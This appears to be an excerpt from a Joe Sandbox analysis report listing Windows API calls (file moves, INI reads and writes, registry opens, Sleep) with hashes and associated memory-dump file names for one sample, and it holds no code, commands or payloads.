                                                                          • Snapshot File: hcaresult_0_2_400000_hnTW5HdWvY.jbxd
                                                                          Similarity
                                                                          • API ID: AttributesFile
                                                                          • String ID:
                                                                          • API String ID: 3188754299-0
                                                                          • Opcode ID: 9001e84463e5b3d4dd00ca1d2e00f3bb66c1d6c16300b22364f3152d7eb201de
                                                                          • Instruction ID: aa63d8e265fec5eadac8fa568c07c8a88d9efeeaed3b0596099faf0ea9ff9f2d
                                                                          • Opcode Fuzzy Hash: 9001e84463e5b3d4dd00ca1d2e00f3bb66c1d6c16300b22364f3152d7eb201de
                                                                          • Instruction Fuzzy Hash: 4FD0C972908120EBD2102728AD0889BBB55EB542717028B31FC65A22F0C7304C62CAA5
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • MoveFileA.KERNEL32(00000000,00000000), ref: 0040166B
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1658713547.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1658696695.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658730160.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.00000000007A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.00000000007C7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.00000000007D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1659146974.00000000007D1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1659146974.00000000007E1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1659146974.00000000007EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1659146974.00000000007F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_hnTW5HdWvY.jbxd
                                                                          Similarity
                                                                          • API ID: FileMove
                                                                          • String ID:
                                                                          • API String ID: 3562171763-0
                                                                          • Opcode ID: c3189b913f4bdfc7a50826e090988e233579a56b949653883f3a96102e5b8159
                                                                          • Instruction ID: fdd1d07a1cda23b4c621ee5f99cf321ddf643a1f3ef69347ea822d0c43c5abfe
                                                                          • Opcode Fuzzy Hash: c3189b913f4bdfc7a50826e090988e233579a56b949653883f3a96102e5b8159
                                                                          • Instruction Fuzzy Hash: 20F0E936A08121A3CB50B7B64E4DD5F22A49F81328F24473BB111B21D5EABC8A42E55F
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • WritePrivateProfileStringA.KERNEL32(00000000,00000000,?,00000000), ref: 00402276
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1658713547.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1658696695.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658730160.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.00000000007A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.00000000007C7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.00000000007D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1659146974.00000000007D1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1659146974.00000000007E1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1659146974.00000000007EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1659146974.00000000007F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_hnTW5HdWvY.jbxd
                                                                          Similarity
                                                                          • API ID: PrivateProfileStringWrite
                                                                          • String ID:
                                                                          • API String ID: 390214022-0
                                                                          • Opcode ID: 7a5cf04908828b9370c7e1d9ddcee0dd976931224771c270c0e0b8fcf7056786
                                                                          • Instruction ID: dff1fc4e61f6baddcfaee85270a2ae07bc7b47d3ff6ea6eee97db9607061b2c7
                                                                          • Opcode Fuzzy Hash: 7a5cf04908828b9370c7e1d9ddcee0dd976931224771c270c0e0b8fcf7056786
                                                                          • Instruction Fuzzy Hash: CCE04F72B041756ADB903AF10E8DD7F21597B84344F24067EF601B62CAD9BC0D42626D
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • RegOpenKeyExA.KERNELBASE(00000000,?,00000000,00000022,00000000,?,?,?,004022CE,00000002), ref: 00402B31
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1658713547.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1658696695.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658730160.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.00000000007A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.00000000007C7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.00000000007D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1659146974.00000000007D1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1659146974.00000000007E1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1659146974.00000000007EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1659146974.00000000007F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_hnTW5HdWvY.jbxd
                                                                          Similarity
                                                                          • API ID: Open
                                                                          • String ID:
                                                                          • API String ID: 71445658-0
                                                                          • Opcode ID: cfdcf35e6c4fa250502a21fc57dd23c757fa136f3a88176d4338085178caf540
                                                                          • Instruction ID: 2505cc1c08e1157338d6304f64f5344ce4618cc943ce50a8c0e79a918c25dddd
                                                                          • Opcode Fuzzy Hash: cfdcf35e6c4fa250502a21fc57dd23c757fa136f3a88176d4338085178caf540
                                                                          • Instruction Fuzzy Hash: 30E046B6250108AEDB40EBA4ED4AE9A77ECAB08704F008121B608E7091CB78E5509B69
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,0040307D,00000000,00000000,00402EB4,000000FF,00000004,00000000,00000000,00000000), ref: 00405897
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1658713547.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1658696695.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658730160.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.00000000007A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.00000000007C7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.00000000007D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1659146974.00000000007D1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1659146974.00000000007E1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1659146974.00000000007EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1659146974.00000000007F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_hnTW5HdWvY.jbxd
                                                                          Similarity
                                                                          • API ID: FileRead
                                                                          • String ID:
                                                                          • API String ID: 2738559852-0
                                                                          • Opcode ID: d04482319dc3028e4ce08f739f1cf32aeeec85f3b87b0f01a1fec36d148a5575
                                                                          • Instruction ID: df475e3658bf3194c7d81d82672e2126c085ec444a71cd8ce056a8dbc7516895
                                                                          • Opcode Fuzzy Hash: d04482319dc3028e4ce08f739f1cf32aeeec85f3b87b0f01a1fec36d148a5575
                                                                          • Instruction Fuzzy Hash: DFE0B63261425AABEF10AE659C00AAB7B6CEF05261F008432BD25E2150E235E8219AA5
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • GetPrivateProfileStringA.KERNEL32(00000000,?,?,?,000003FF,00000000), ref: 004022B4
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1658713547.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1658696695.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658730160.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.00000000007A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.00000000007C7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.00000000007D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1659146974.00000000007D1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1659146974.00000000007E1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1659146974.00000000007EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1659146974.00000000007F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_hnTW5HdWvY.jbxd
                                                                          Similarity
                                                                          • API ID: PrivateProfileString
                                                                          • String ID:
                                                                          • API String ID: 1096422788-0
                                                                          • Opcode ID: 4d18850fc1b70aa6ba1e60ee85fd3d2ecaf17a2ff09a7e68fe5c73ff56aba4af
                                                                          • Instruction ID: bdd16972d33a24d8f715dd244a4521dc24e47ebf505f01b716e53bc3963aa27b
                                                                          • Opcode Fuzzy Hash: 4d18850fc1b70aa6ba1e60ee85fd3d2ecaf17a2ff09a7e68fe5c73ff56aba4af
                                                                          • Instruction Fuzzy Hash: 03E08671A44205BADB406FA08D09EBD3668BF01710F10013AF9507B0D5EBB88442B71D
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • SetFileAttributesA.KERNELBASE(00000000,?,000000F0), ref: 004015A0
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1658713547.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1658696695.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658730160.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.00000000007A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.00000000007C7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.00000000007D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1659146974.00000000007D1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1659146974.00000000007E1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1659146974.00000000007EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1659146974.00000000007F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_hnTW5HdWvY.jbxd
                                                                          Similarity
                                                                          • API ID: AttributesFile
                                                                          • String ID:
                                                                          • API String ID: 3188754299-0
                                                                          • Opcode ID: e3a13878c1d56836359fd6a287f604c402d733337bfeebe65ae23d65cbfee957
                                                                          • Instruction ID: 27692f5c007c61cd34b15d2854f29c5ac536ba6a0fe93b079eee6ce04d3e2e01
                                                                          • Opcode Fuzzy Hash: e3a13878c1d56836359fd6a287f604c402d733337bfeebe65ae23d65cbfee957
                                                                          • Instruction Fuzzy Hash: 03D01273A04110DBDB00DBB5AE0899D7364AB44329F208637D111F11D0D6B98541A629
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • SendMessageA.USER32(00010468,00000000,00000000,00000000), ref: 00403EC6
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1658713547.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1658696695.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658730160.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.00000000007A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.00000000007C7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.00000000007D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1659146974.00000000007D1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1659146974.00000000007E1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1659146974.00000000007EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1659146974.00000000007F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_hnTW5HdWvY.jbxd
                                                                          Similarity
                                                                          • API ID: MessageSend
                                                                          • String ID:
                                                                          • API String ID: 3850602802-0
                                                                          • Opcode ID: 499d621b576c19b091bc41f39921371812b2519aa52b2e9da7a6b0776abc8bab
                                                                          • Instruction ID: 4e2cb91dbe0d2d692b2d6efd4920526f8e19958c85e819a44f08040356fb0c65
                                                                          • Opcode Fuzzy Hash: 499d621b576c19b091bc41f39921371812b2519aa52b2e9da7a6b0776abc8bab
                                                                          • Instruction Fuzzy Hash: 4CC04C716552016BEA219B51DD49F077B586750B01F288425B214E50D1C674E411D66D
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402DF2,0002FBE4), ref: 0040308E
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1658713547.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1658696695.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658730160.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.00000000007A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.00000000007C7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.00000000007D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1659146974.00000000007D1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1659146974.00000000007E1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1659146974.00000000007EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1659146974.00000000007F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_hnTW5HdWvY.jbxd
                                                                          Similarity
                                                                          • API ID: FilePointer
                                                                          • String ID:
                                                                          • API String ID: 973152223-0
                                                                          • Opcode ID: 0070af3e33726fe8c9f5218e9eb5d27e4edbe1e9193197dd8736a9b9f47decae
                                                                          • Instruction ID: 49fdcfdf8b1973cd13611e97ba0bfafd8618b6cb304eeeee9131019f9f046fb0
                                                                          • Opcode Fuzzy Hash: 0070af3e33726fe8c9f5218e9eb5d27e4edbe1e9193197dd8736a9b9f47decae
                                                                          • Instruction Fuzzy Hash: 03B01271644200BFDA214F00DF05F057B21A790700F10C030B748380F082712420EB4D
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • SendMessageA.USER32(00000028,?,00000001,00403CCE), ref: 00403EAB
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1658713547.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1658696695.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658730160.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.00000000007A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.00000000007C7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.00000000007D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1659146974.00000000007D1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1659146974.00000000007E1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1659146974.00000000007EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1659146974.00000000007F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_hnTW5HdWvY.jbxd
                                                                          Similarity
                                                                          • API ID: MessageSend
                                                                          • String ID:
                                                                          • API String ID: 3850602802-0
                                                                          • Opcode ID: 35a6196438d1a925b40bb9ea9467f367b5e4dbb747a92e5962faa32c49fde1e9
                                                                          • Instruction ID: ba241267bb6bb17dd96f019753e8ffde110831ee2db3609d4ff9709f9aeeb587
                                                                          • Opcode Fuzzy Hash: 35a6196438d1a925b40bb9ea9467f367b5e4dbb747a92e5962faa32c49fde1e9
                                                                          • Instruction Fuzzy Hash: 9DB09235985200AAEA224B00DD09F457A62A7A4702F008024B200240F0C7B200A0DB19
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • KiUserCallbackDispatcher.NTDLL(?,00403C67), ref: 00403E94
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1658713547.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1658696695.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658730160.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.00000000007A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.00000000007C7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.00000000007D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1659146974.00000000007D1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1659146974.00000000007E1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1659146974.00000000007EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1659146974.00000000007F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_hnTW5HdWvY.jbxd
                                                                          Similarity
                                                                          • API ID: CallbackDispatcherUser
                                                                          • String ID:
                                                                          • API String ID: 2492992576-0
                                                                          • Opcode ID: 55a9af0324514cff772be1897e352456f34009a7f25595ef81cb2bf9e2c159b8
                                                                          • Instruction ID: c344ebf8080bf58bdbcf791898ba473ebe4cebcd01df1b5cfbd91641023a3e3b
                                                                          • Opcode Fuzzy Hash: 55a9af0324514cff772be1897e352456f34009a7f25595ef81cb2bf9e2c159b8
                                                                          • Instruction Fuzzy Hash: 76A01132808002EBCB028B00EF0AC0ABF22ABA0B00B028822F200800308A320820FF0A
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • Sleep.KERNELBASE(00000000), ref: 004014E5
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1658713547.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1658696695.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
